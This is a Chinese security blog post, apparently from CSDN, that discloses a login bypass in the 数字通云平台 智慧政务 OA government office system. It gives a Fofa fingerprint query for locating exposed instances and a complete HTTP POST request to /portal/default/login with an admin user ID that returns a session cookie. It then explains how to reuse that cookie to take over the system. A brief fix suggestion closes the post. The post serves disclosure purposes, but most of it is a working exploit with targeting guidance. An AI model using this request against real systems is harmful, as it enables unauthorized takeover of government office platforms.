首页 > 其他分享 >数字通云平台智慧政务 login 存在登录绕过

数字通云平台智慧政务 login 存在登录绕过

时间:2024-09-23 10:21:05浏览次数:11  
标签:登录 获取 ip 漏洞 cookie login 通云

0x01 漏洞描述:

        数字通云平台智慧政务OA产品是基于云计算、大数据、人工智能等先进技术,为政府部门量身定制的智能化办公系统。该系统旨在提高政府部门的办公效率、协同能力和信息资源共享水平,推动电子政务向更高层次发展。

        数字通云平台 智慧政务OA login接口存在未授权获取默认cookie,未经身份验证的远程攻击者可利用该漏洞伪造登录,从而接管整个系统。

0x02 搜索语句:

Fofa:body="assets/8cca19ff/css/bootstrap-yii.css"

0x03 漏洞复现:

该漏洞是由于系统中存在默认cookie获取接口导致的权限绕过

POST /portal/default/login HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

userID=admin&flag=rone

 获取cookie

将cookie 写入到浏览器中

直接访问ip或者 

http://your-ip:port/theme/concise

 

0x04 修复建议:

系统禁用默认获取cookie接口

标签:登录,获取,ip,漏洞,cookie,login,通云
From: https://blog.csdn.net/xc_214/article/details/142451124

相关文章

  • 后台发布文章时,跳到重新登录界面
    根据描述,问题的原因在于网站已经启用了HTTPS协议,但是管理员却使用HTTP协议访问后台,这可能导致了一些安全机制上的冲突,比如点击发布文章时会被重定向到登录界面。解决方法为了让网站在HTTP访问时强制跳转到HTTPS,您可以采取以下步骤:配置Web服务器:Apache:编辑站点配置文件(通常......
  • SSH终端导入密钥登录
    ssh终端通过密钥登录有三种方式,一种是通过ssh-copy-id命令,另一种是通过手动导入公钥。第三种是将远程主机的密钥下载到本地导入,下面分别介绍这两种方式。1.ssh-copy-id命令ssh-copy-id命令可以将本地用户的公钥复制到远程主机的authorized_keys文件中,从而实现免密码登录。使用......
  • 帝国CMS网站登录后台提示“登录成功”,接着又提示“您还未登录”
    当你在登录帝国CMS后台时遇到“登录成功”但紧接着提示“您还未登录”的问题,这通常是因为后台登录相关的目录权限设置不当。具体来说,/e/data/adminlogin目录的权限设置不正确,导致登录信息无法正确保存。解决方法设置目录权限将/e/data/adminlogin目录的权限设置为777。具......
  • 为什么默认数据库登录失败
    当你在使用帝国CMS时遇到默认数据库登录失败的情况,这通常意味着存在一些配置错误或数据库本身的问题。以下是一些可能导致默认数据库登录失败的原因及相应的解决方案:可能的原因及解决方法数据库配置错误检查配置文件:确保数据库配置文件(通常是/e/config/config.php)中的数据库......
  • 帝国模板登录出现已被登录或者密码错误解决方法
    当帝国CMS(EmpireCMS)后台登录时出现“已被登录”或“密码错误”的提示,这可能是由多种原因造成的。以下是一些可能的解决方法:密码错误确认密码确认输入的密码是否正确。注意区分大小写,以及是否有空格等。重置密码如果忘记了密码,可以通过直接访问数据库来重置密码。使用......
  • 帝国CMS登录后台提示“登录成功”,接着又提示“您还未登录”
    当你在登录帝国CMS后台时遇到“登录成功”,紧接着又提示“您还未登录”的问题时,这通常是由于系统无法保存会话信息导致的。根据提供的信息,问题的原因在于/e/data/adminlogin目录的权限设置不当,使得系统无法在此目录下写入必要的会话文件。解决方案更改目录权限要解决这个问题,......
  • 前端表单布局丨简洁大气的登录表单二(源码)
    效果展示:HTML: <body><divclass="container"><divclass="heading">SignIn</div><formaction=""class="form"><inputrequired=""class="input"t......
  • 商城项目改进分布式缓存下的登录逻辑和页面展示-----商城项目
    packagecom.alatus.mall.auth.app;importcom.alatus.common.constant.AuthServerConstant;importcom.alatus.common.exception.BizCodeEnum;importcom.alatus.common.utils.R;importcom.alatus.common.vo.MemberRespVo;importcom.alatus.mall.auth.feign.MemberFe......
  • VMware虚拟机因磁盘空间不足黑屏无法登录
    在虚拟机里存储了一些文件之后,再打开发现进不去了,只有光标一直在左上角,登录的框都是黑的,具体如下:明明知道登录框的存在却怎么也触碰不到它T_T,先说解决方法:产生这个问题的原因是因为磁盘空间满了,所以要删除掉一些文件,但是我们现在又进不去,那咋办呢?开机的时候按shift键(也可......
  • 搭建kuboard-v3并配置使用ldap登录
    官方文档:https://www.kuboard.cn/install/v3/install-in-k8s.htmlnamespace.yaml点击查看代码apiVersion:v1kind:Namespacemetadata:name:kuboardconfigMap.yaml点击查看代码apiVersion:v1kind:ConfigMapmetadata:name:kuboard-v3-confignamespa......